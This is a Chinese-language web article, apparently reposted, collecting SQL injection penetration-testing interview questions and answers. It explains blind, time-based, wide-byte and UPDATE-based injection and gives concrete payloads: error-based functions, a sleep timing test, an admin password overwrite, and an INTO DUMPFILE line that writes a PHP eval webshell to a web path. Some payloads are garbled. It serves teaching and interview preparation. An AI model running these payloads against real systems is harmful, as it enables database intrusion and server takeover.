文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

SQL注入渗透测试以及护网面试题有哪些

2023-06-26 04:23

关注

这篇文章主要介绍“SQL注入渗透测试以及护网面试题有哪些”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“SQL注入渗透测试以及护网面试题有哪些”文章能帮助大家解决问题。

SQL 注入漏洞成因、注入的类型和方式、防范?

提交错误语句是否有异常,除此之外这些显示的错误可以通过 sleep,修眠语句执⾏ 5 秒,通过 DNSlog 判断传回值等。

select * from news where id = '$SQL';

当程序执⾏访问新闻等⼀些操作都会执⾏到 sql 语句进行调用,如果在此调⽤过程中,提交了不合法的数据,⽽数据库⽆法识别则会报错。也就是⼀切输⼊都是有害的。

注入类型有 6 种,可以参考 SQLMAP,报错、盲注、联合、时间、内联、堆叠

注入提交方式:GET、POST、Cookies、⽂件头

防范: 边界 -> CDN(内容分发网络) -> 脚本语⾔过滤 -> 数据库过滤最小权限 -> 主机

盲注是什么?怎么盲注?

盲注是在 SQL 注⼊攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回内容的变化来判断是否存在 SQL 注⼊和利⽤的⽅式。
盲注的⼿段有两种,

⼀个是通过⻚⾯的返回内容是否正确 (boolean-based),来验证是否存在注⼊。

⼀个是通过 sql 语句处理时间的不同来判断是否存在注⼊ (time-based),在这⾥,可以⽤ benchmark,sleep 等造成延时效果的函数,也可以通过构造⼤笛卡⼉积的联合查询表来达到延时的⽬的。

宽字节注入原理

产⽣原理

在数据库使⽤了宽字符集而 WEB 中没考虑这个问题的情况下,在 WEB 层,由于 0XBF27 是两个字符,在 PHP 中⽐如addslash 和 magic_quotes_gpc 开启时,由于会对 0x27 单引号进⾏转义,因此 0xbf27 会变成 0xbf5c27, ⽽数据进⼊数据库中时,由于 0XBF5C 是⼀个另外的字符,因此 转义符号会被前⾯的 bf 带着 “吃掉”,单引号由此逃逸出来可以⽤来闭合语句。

根本原因

character_set_client(客户端的字符集) 和 character_set_connection(连接层的字符集) 不同, 或转换函数如,iconv、mb_convert_encoding 使⽤不当。

解决办法

统⼀数据库、Web 应⽤、操作系统所使⽤的字符集,避免解析产⽣差异,最好都设置为 UTF-8。或对数据进⾏正确的转义,如 mysql_real_escape_string+mysql_set_charset 的使⽤。

SQL 里面只有 update 怎么利用

先理解这句 SQL

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

如果此 SQL 被修改成以下形式,就实现了注⼊

修改 homepage 值为 http://xxx.net’, userlevel='3

之后 SQL 语句变为

UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'

userlevel 为⽤户级别

修改 password 值为 mypass)’ WHERE username=‘admin’#

之后 SQL 语句变为

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

修改 id 值为 ’ OR username=‘admin’ 之后 SQL 语句变为

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

为什么参数化查询可以防止SQL 注入?

原理:

使⽤参数化查询数据库服务器不会把参数的内容当作 sql 指令的⼀部分来执⾏,是在数据库完成 sql 指令的编译后才套⽤参数运⾏。

简单的说: 参数化能防注⼊的原因在于, 语句是语句,参数是参数,参数的值并不是语句的⼀部分,数据库只按语句的语义跑。

报错注入的函数有哪些?

and extractvalue(1, concat(0x7e,(select @@version),0x7e))通过floor报错 向下取整3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));exp()select from test where id=1 and exp(~(select * from(select user())a));

延时注入如何来判断?

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

盲注和延时注入的共同点?

都是⼀个字符⼀个字符的判断。

sql 注入写文件都有哪些函数?

select '⼀句话' into outfile '路径'select '⼀句话' into dumpfile '路径'select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php;

如何防护SQL注入攻击呢?

对代码进行过滤非法符号如</?&>之类的,对一些脚本标签scrpt以及img或frame都进行过滤和替换。

对一些函数变量直接进行强制定义,比如金额函数这里直接限定只能写入正整数类型的数值,那么其他的参数像姓名的话可以直接限定到只允许写入中文和英文的数值,其他的以此类推。

对一些带入数据库查询和更新的语句,一定要看看get或post过来的数据参数是否是直接把参数类型锁定好了的,防止被注入恶意语句导致被攻击。

关于“SQL注入渗透测试以及护网面试题有哪些”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识,可以关注编程网行业资讯频道,小编每天都会为大家更新不同的知识点。

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯